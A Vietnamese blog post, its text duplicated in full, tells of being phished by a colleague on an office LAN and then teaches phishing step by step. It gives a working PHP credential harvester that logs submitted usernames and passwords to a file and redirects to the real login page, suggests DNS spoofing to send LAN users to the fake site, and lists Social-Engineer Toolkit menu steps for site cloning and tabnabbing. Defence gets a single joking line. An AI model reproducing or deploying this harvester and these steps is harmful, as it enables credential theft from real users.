Hi all,
Hôm nay mình kể lại câu chuyện lúc ngồi trong cơ quan, đang ngồi tự nhiên có một nick rất lạ gửi cho tôi một link http://goo.gl/qih4 và mời gọi kích vào (ái rà anh nào định hit mình đây, Find sơ qua tôi đã biết http://goo.gl là tính năng của bạn google cho phép tạo một url ngắn, giúp cho người dùng dễ nhớ và đây cũng là cũng là tiện ích cho các nhà cung cấp quảng bá sản của họ tới khách hàng, url được tạo thời gian thực chúng ta đánh một IP bất kỳ, hoặc tên miền bất kỳ vào thì đầu ra của trang là môt url ngắn : goo.gl/link .
you send me: http://goo.gl/qih4 nhân tiện lúc đang test về virus vậy nên okie cứ kích vào thôi. Quả nhiên kích vào link trên trên url hiện ngay ip chú 10.36.x.x . He he thì ra là một chú trong LAN đang muốn hit mình, cái page home là mail của cơ quan mình. He, đây là trò phishing mà cách đây 2 năm tôi đã từng test (vì ip mail của cơ quan tôi ko phải địa chỉ mà tôi đang thấy 10.36.x.x. Nhưng không sao để xem cậu ta sẽ thực thi những gì vì tiện đang chạy tool show các process trên máy, tôi liền đánh user, pass tất nhiên là đánh bừa rồi :). Tôi biết ip của máy cậu ta rồi, vì tôi đã dùng một số tool để main in the middle cậu ta, quả nhiên cậu ta đang vào mail nội bộ để check user xem user và pass của tôi đánh có đúng không. Hi và tôi đã lại chỗ cậu ta và nhận được mộ phản ứng cười và nói, em đang test một tool demo trên Backtrack'. Tôi đồng ý nhưng theo chính sách An toàn thông tin thì ta bị phạm khi thực hiện hành động này trên hệ thống của tổ chức tôi. Hi
Đây chỉ câu chuyện nhỏ, quan trọng bài này tôi muốn giúp các bạn hiểu được bản chất phishing là gì và các cách thường sử dụng.
- Phishing: 'Câu cá' bản chất của nó là tạo ra hệ thống giống giả có giao diện giống như thật nhằm đánh lừa người sử dụng vào, và lúc này hacker có thể lấy toàn bộ thông tin của người dùng khi vào trang giả mạo này.
- Cách cách phishing:
+Tạo một face giao diện như trang thật vd: mail.google.com,forum/login.com.vn (tạo face quá đơn giản rồi ) lấy mã nguồn của trang đấy chỉnh sửa thành của mình, bạn sử code có đọan "get" thành "post" và action ="tên của file sau khi đăng nhập vd: fake.php"
code facke.php
<?php
header("Location: echttp://hummer.xxx:8000/calendar/login.php?cd=1&domain=default");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
//http://hummer.xxx:8000/calendar/login.php?cd=1&domain=default là địa chỉ thật
------
passwords.txt view pass.
xong , nhưng lúc này bạn gửi link chính là địa chỉ của máy mình hoặc chuyển sang tên miền dùng http://goo.gl, hoặc tên miền local của mình. Nhưng có cách nào để dùng chính tên miền thật ?
+ Advance : sử dụng số số phương pháp DNS Spoofing Attack http://mysunitsecurity.blogspot.com/2010/11/dns-spoofing-attack.html để reject tên miền đảm bảo rằng tất cả người dùng trong LAN http://hummer.xxx:8000/calendar/login.php?cd=1&domain=default đều chuyển sang đại chỉ ip của máy của bạn.(Ha.ha thú vị lắm đấy). :)
Nếu bạn đã từng sử dụng backtrack thì việc thực hiện phishing dễ hơn vì sử dụng sản OS và tool có sẵn :
cd pentest/exploit/set
./set ->
-> web attack vectors
-> tabnabbing attack method
-> site cloner "tape url site wam phishing"
-> enter.
send ip victim :)
- Phòng tránh: Đừng chết vì thiết hiểu biết nhé các Men :)
------------------------
Hôm nay mình kể lại câu chuyện lúc ngồi trong cơ quan, đang ngồi tự nhiên có một nick rất lạ gửi cho tôi một link http://goo.gl/qih4 và mời gọi kích vào (ái rà anh nào định hit mình đây, Find sơ qua tôi đã biết http://goo.gl là tính năng của bạn google cho phép tạo một url ngắn, giúp cho người dùng dễ nhớ và đây cũng là cũng là tiện ích cho các nhà cung cấp quảng bá sản của họ tới khách hàng, url được tạo thời gian thực chúng ta đánh một IP bất kỳ, hoặc tên miền bất kỳ vào thì đầu ra của trang là môt url ngắn : goo.gl/link .
you send me: http://goo.gl/qih4 nhân tiện lúc đang test về virus vậy nên okie cứ kích vào thôi. Quả nhiên kích vào link trên trên url hiện ngay ip chú 10.36.x.x . He he thì ra là một chú trong LAN đang muốn hit mình, cái page home là mail của cơ quan mình. He, đây là trò phishing mà cách đây 2 năm tôi đã từng test (vì ip mail của cơ quan tôi ko phải địa chỉ mà tôi đang thấy 10.36.x.x. Nhưng không sao để xem cậu ta sẽ thực thi những gì vì tiện đang chạy tool show các process trên máy, tôi liền đánh user, pass tất nhiên là đánh bừa rồi :). Tôi biết ip của máy cậu ta rồi, vì tôi đã dùng một số tool để main in the middle cậu ta, quả nhiên cậu ta đang vào mail nội bộ để check user xem user và pass của tôi đánh có đúng không. Hi và tôi đã lại chỗ cậu ta và nhận được mộ phản ứng cười và nói, em đang test một tool demo trên Backtrack'. Tôi đồng ý nhưng theo chính sách An toàn thông tin thì ta bị phạm khi thực hiện hành động này trên hệ thống của tổ chức tôi. Hi
Đây chỉ câu chuyện nhỏ, quan trọng bài này tôi muốn giúp các bạn hiểu được bản chất phishing là gì và các cách thường sử dụng.
- Phishing: 'Câu cá' bản chất của nó là tạo ra hệ thống giống giả có giao diện giống như thật nhằm đánh lừa người sử dụng vào, và lúc này hacker có thể lấy toàn bộ thông tin của người dùng khi vào trang giả mạo này.
- Cách cách phishing:
+Tạo một face giao diện như trang thật vd: mail.google.com,forum/login.com.vn (tạo face quá đơn giản rồi ) lấy mã nguồn của trang đấy chỉnh sửa thành của mình, bạn sử code có đọan "get" thành "post" và action ="tên của file sau khi đăng nhập vd: fake.php"
code facke.php
<?php
header("Location: echttp://hummer.xxx:8000/calendar/login.php?cd=1&domain=default");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
//http://hummer.xxx:8000/calendar/login.php?cd=1&domain=default là địa chỉ thật
------
passwords.txt view pass.
xong , nhưng lúc này bạn gửi link chính là địa chỉ của máy mình hoặc chuyển sang tên miền dùng http://goo.gl, hoặc tên miền local của mình. Nhưng có cách nào để dùng chính tên miền thật ?
+ Advance : sử dụng số số phương pháp DNS Spoofing Attack http://mysunitsecurity.blogspot.com/2010/11/dns-spoofing-attack.html để reject tên miền đảm bảo rằng tất cả người dùng trong LAN http://hummer.xxx:8000/calendar/login.php?cd=1&domain=default đều chuyển sang đại chỉ ip của máy của bạn.(Ha.ha thú vị lắm đấy). :)
Nếu bạn đã từng sử dụng backtrack thì việc thực hiện phishing dễ hơn vì sử dụng sản OS và tool có sẵn :
cd pentest/exploit/set
./set ->
-> web attack vectors
-> tabnabbing attack method
-> site cloner "tape url site wam phishing"
-> enter.
send ip victim :)
- Phòng tránh: Đừng chết vì thiết hiểu biết nhé các Men :)
------------------------